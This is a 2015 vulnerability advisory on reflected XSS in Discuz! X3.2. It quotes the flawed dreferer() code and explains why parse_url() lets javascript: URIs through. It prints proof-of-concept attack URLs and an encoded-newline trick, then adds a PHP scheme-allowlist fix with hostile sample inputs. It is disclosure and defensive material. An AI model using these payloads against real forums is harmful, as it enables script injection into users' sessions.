Discuz! X3.2 multiple reflected XSS vulnerabilities caused by a function defect - vulnerability warning - the black bar safety net

2015-06-06T00:00:00
ID MYHACK58:62201563299
Type myhack58
Reporter 佚名 (anonymous)
Modified 2015-06-06T00:00:00

Description

Reflected XSS caused by a defect in a core helper function (dreferer()).

Detailed description:

member.php?mod=logging&action=login&referer=javascript://www.discuz.net/

code area

<p>welcome back, Newbie xx, it will now be transferred to the login page<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p>

<p class="alert_btnleft"><a href="javascript://www.discuz.net/">if your browser does not automatically jump, please click on this link</a></p>

connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/

code area

<p>sorry, currently there are network problems or server busy, detailed error: connect_error_code_0 error code:<a target=_blank href="http://wiki.opensns.qq.com/wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E5%85%AC%E5%85%B1%E8%BF%94%E5%9B%9E%E7%A0%81%E8%AF%B4%E6%98%8E">the openId signature invalid</a>, please wait then try again. Thank you.<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p>

<p class="alert_btnleft"><a href="javascript://www.discuz.net/">if your browser does not automatically jump, please click on this link</a></p>

source/function/function_core.php:

code area

function dreferer($default = '') {
    ......
    // a referer pointing back at the login page itself is replaced by the default
    if(strpos($_G['referer'], 'member.php?mod=logging')) {
        $_G['referer'] = $default;
    }
    // parse_url() only splits the string; it does not check that the scheme is http(s)
    $reurl = parse_url($_G['referer']);
    if(!empty($reurl['host']) && !in_array($reurl['host'], array($_SERVER['HTTP_HOST'], 'www.'.$_SERVER['HTTP_HOST'])) && !in_array($_SERVER['HTTP_HOST'], array($reurl['host'], 'www.'.$reurl['host']))) {
        // host differs from HTTP_HOST: allowed only for configured app / sub-site domains
        if(!in_array($reurl['host'], $_G['setting']['domain']['app']) && !isset($_G['setting']['domain']['list'][$reurl['host']])) {
            $domainroot = substr($reurl['host'], strpos($reurl['host'], '.')+1);
            if(empty($_G['setting']['domain']['root']) || (is_array($_G['setting']['domain']['root']) && !in_array($domainroot, $_G['setting']['domain']['root']))) {
                $_G['referer'] = $_G['setting']['domain']['defaultindex'] ? $_G['setting']['domain']['defaultindex'] : 'index.php';
            }
        }
    } elseif(empty($reurl['host'])) {
        // no host at all: treat as a site-relative path
        $_G['referer'] = $_G['siteurl'].'./'.$_G['referer'];
    }
    $_G['referer'] = durlencode($_G['referer']);
    return $_G['referer'];
}

This code uses parse_url() to split the referer and then compares the resulting host with $_SERVER['HTTP_HOST'] to decide whether the URL belongs to this site. parse_url() itself performs no validity check on the scheme: for javascript://www.discuz.net/ it returns scheme "javascript" and host "www.discuz.net", so the host comparison succeeds and the javascript: URI passes through unchanged. The value is then written, unescaped, into the setTimeout() redirect and into the fallback link href shown above, where the browser treats it as a javascript: URI and executes it. Note that in a javascript: URI the text after // is a JavaScript line comment, so code to be executed has to follow a URL-encoded line break after the host part; the host part is what satisfies the check.

Vulnerability proof:

[proof-of-concept screenshot not preserved]

Repair solutions:

Validate the result of parse_url() before accepting the referer: only allow an empty scheme (a site-relative path) or http/https, and fall back to the default index for anything else. A host comparison alone is not sufficient, because javascript: and similar URIs can carry a host component that matches the site.
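The following is an added example of the repair described above, not Discuz! code: a referer check that allowlists the scheme returned by parse_url() before comparing hosts, so that the javascript://www.discuz.net/ referer from the detailed description is rejected while normal absolute and relative URLs are kept. The function name safe_referer(), the $host parameter (standing in for $_SERVER['HTTP_HOST']) and the sample URLs in the loop are assumptions made for the illustration.

```php
<?php
// Added example (not part of Discuz! or of the original advisory).
// safe_referer(), $host and the sample URLs below are assumptions.

function safe_referer(string $referer, string $host, string $default = 'index.php'): string
{
    $parts = parse_url($referer);
    if ($parts === false) {
        return $default;                    // unparsable input is never echoed back
    }

    // 1. Scheme allowlist. parse_url('javascript://www.discuz.net/') returns
    //    scheme "javascript" and host "www.discuz.net", so a host-only check
    //    passes it. Only http(s), or no scheme at all (a relative reference),
    //    is acceptable here.
    if (isset($parts['scheme'])
        && !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $default;
    }

    // 2. Host check, mirroring the original comparison against HTTP_HOST with
    //    and without a "www." prefix, but reached only for http(s) URLs.
    //    This also rejects protocol-relative "//evil.example/".
    if (!empty($parts['host'])) {
        $h    = strtolower($parts['host']);
        $site = strtolower($host);
        $sameSite = in_array($h, [$site, 'www.' . $site], true)
                 || in_array($site, [$h, 'www.' . $h], true);
        return $sameSite ? $referer : $default;
    }

    // 3. No host: a site-relative path. Backslashes are rejected because some
    //    browsers normalise "\\evil.example" to "//evil.example", which
    //    parse_url() does not see as a host.
    if (strpos($referer, '\\') !== false) {
        return $default;
    }
    return $referer;
}

// Constructed sample inputs; the site host is assumed to be www.discuz.net.
$site = 'www.discuz.net';
foreach ([
    'javascript://www.discuz.net/',          // advisory payload: host matches, scheme does not
    'JavaScript://www.discuz.net/%0Aalert(1)', // case variation, same outcome
    'http://www.discuz.net/forum.php',       // legitimate absolute URL, kept
    'https://discuz.net/forum.php',          // same site without www., kept
    '//evil.example/',                       // protocol-relative, foreign host
    'forum.php?mod=viewthread&tid=1',        // relative path, kept
    '\\\\evil.example/',                     // backslash trick, rejected
] as $r) {
    printf("%-42s => %s\n", $r, safe_referer($r, $site));
}
```

The allowlist is deliberately on the scheme rather than a denylist of "javascript", "data" and so on; a denylist has to anticipate every dangerous scheme, while the allowlist only has to describe the two the redirect is meant to support. Output encoding for the two sinks (the JavaScript string inside setTimeout() and the href attribute) is a separate, additional fix and is not shown here.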